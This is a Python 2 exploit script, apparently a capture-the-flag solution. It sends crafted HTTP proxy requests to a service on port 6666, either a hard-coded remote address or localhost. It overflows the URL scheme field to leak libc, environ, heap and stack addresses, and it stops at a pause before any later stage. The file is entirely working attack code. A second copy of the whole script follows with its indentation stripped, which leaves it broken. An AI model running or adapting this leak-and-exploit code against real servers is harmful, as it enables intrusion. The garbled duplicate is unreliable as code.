potetisensei/weff.py Secret

## weff.py
import string
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep, time
from sys import argv, exit

def read_noblock(p, n):
    p.setblocking(False)
    try:
        ret = p.recv(n)
    except:
        ret = ''
    p.setblocking(True)
    return ret

def read_until(p, string):
    s = ""
    while 1:
        c = p.recv(1)
        s += c
        if s[-len(string):] == string:
            return s

def read_n(p, n, timeout=-1):
    s = ""
    start = time()
    while len(s) < n:
        s += read_noblock(p, 1)
        if timeout != -1 and time() - start > timeout:
            return s
    return s

def xor(s1, s2):
    ret = ""
    for i in xrange(len(s1)):
        ret += chr(ord(s1[i]) ^ ord(s2[i%len(s2)]))
    return ret

def recv_resp():
    global p

    header = read_until(p, "\r\n\r\n")
    print header

    length = int(header.split("Content-Length: ")[1].split("\n")[0])
    return read_n(p, length)

p = None
def main():
    global p

    p = socket(AF_INET, SOCK_STREAM)
    if len(argv) >= 2:
        p.connect(("54.64.74.49", 6666))
        LIBC_OFF = 0x1a6760
        ENVIRON_OFF = 0x1a7de0
    else :
        p.connect(("localhost", 6666))
        LIBC_OFF = 0x1aa760
        ENVIRON_OFF = 0x1abe00

    p.send("GET http://localhost// HTTP/1.0\n\n")
    print recv_resp()
    sleep(10)
    p.send("GET http://localhost/// HTTP/1.0\n\n")
    print recv_resp()
    p.send("GET http://localhost/ HTTP/1.0\n\n")
    print recv_resp()

    sleep(22)
    p.send("GET http://localhost// HTTP/1.0\n\n")
    print recv_resp()
    payload = "a" * 127
    p.send("GET {payload}://localhost// HTTP/1.0\n\n".format(payload=payload))
    print recv_resp()

    p.send("GET http://localhost/// HTTP/1.0\n\n")
    res = p.recv(1024)
    print [res]

    libc = unpack("<I", res[:4])[0] - LIBC_OFF
    print "libc:", hex(libc)
    environ = libc + ENVIRON_OFF
    print "environ:", hex(environ)

    heap = unpack("<I", res[8:12])[0]
    print "heap:", hex(heap)

    sleep(12)
    p.send("GET http://localhost/ HTTP/1.0\n\n")
    print recv_resp()

    payload = ""
    payload += pack("<I", 0x82d4414f)
    payload += pack("<I", environ)
    payload += pack("<I", 0x7fffffff)
    payload += pack("<I", 0x01010104)
    payload += pack("<I", 0xdeadbeef)
    payload += pack("<I", 0xfeedface)
    p.send("GET {payload}://localhost/ HTTP/1.0\n\n".format(payload=payload))
    res = p.recv(1024)
    print [res]
    stack = unpack("<I", res[1:5])[0]
    print "stack:", hex(stack)

    raw_input("aa")


if __name__ == "__main__":
    main()
	import string
	from socket import *
	from struct import pack, unpack
	from commands import getoutput
	from time import sleep, time
	from sys import argv, exit

	def read_noblock(p, n):
	p.setblocking(False)
	try:
	ret = p.recv(n)
	except:
	ret = ''
	p.setblocking(True)
	return ret

	def read_until(p, string):
	s = ""
	while 1:
	c = p.recv(1)
	s += c
	if s[-len(string):] == string:
	return s

	def read_n(p, n, timeout=-1):
	s = ""
	start = time()
	while len(s) < n:
	s += read_noblock(p, 1)
	if timeout != -1 and time() - start > timeout:
	return s
	return s

	def xor(s1, s2):
	ret = ""
	for i in xrange(len(s1)):
	ret += chr(ord(s1[i]) ^ ord(s2[i%len(s2)]))
	return ret

	def recv_resp():
	global p

	header = read_until(p, "\r\n\r\n")
	print header

	length = int(header.split("Content-Length: ")[1].split("\n")[0])
	return read_n(p, length)

	p = None
	def main():
	global p

	p = socket(AF_INET, SOCK_STREAM)
	if len(argv) >= 2:
	p.connect(("54.64.74.49", 6666))
	LIBC_OFF = 0x1a6760
	ENVIRON_OFF = 0x1a7de0
	else :
	p.connect(("localhost", 6666))
	LIBC_OFF = 0x1aa760
	ENVIRON_OFF = 0x1abe00

	p.send("GET http://localhost// HTTP/1.0\n\n")
	print recv_resp()
	sleep(10)
	p.send("GET http://localhost/// HTTP/1.0\n\n")
	print recv_resp()
	p.send("GET http://localhost/ HTTP/1.0\n\n")
	print recv_resp()

	sleep(22)
	p.send("GET http://localhost// HTTP/1.0\n\n")
	print recv_resp()
	payload = "a" * 127
	p.send("GET {payload}://localhost// HTTP/1.0\n\n".format(payload=payload))
	print recv_resp()

	p.send("GET http://localhost/// HTTP/1.0\n\n")
	res = p.recv(1024)
	print [res]

	libc = unpack("<I", res[:4])[0] - LIBC_OFF
	print "libc:", hex(libc)
	environ = libc + ENVIRON_OFF
	print "environ:", hex(environ)

	heap = unpack("<I", res[8:12])[0]
	print "heap:", hex(heap)

	sleep(12)
	p.send("GET http://localhost/ HTTP/1.0\n\n")
	print recv_resp()

	payload = ""
	payload += pack("<I", 0x82d4414f)
	payload += pack("<I", environ)
	payload += pack("<I", 0x7fffffff)
	payload += pack("<I", 0x01010104)
	payload += pack("<I", 0xdeadbeef)
	payload += pack("<I", 0xfeedface)
	p.send("GET {payload}://localhost/ HTTP/1.0\n\n".format(payload=payload))
	res = p.recv(1024)
	print [res]
	stack = unpack("<I", res[1:5])[0]
	print "stack:", hex(stack)

	raw_input("aa")


	if __name__ == "__main__":
	main()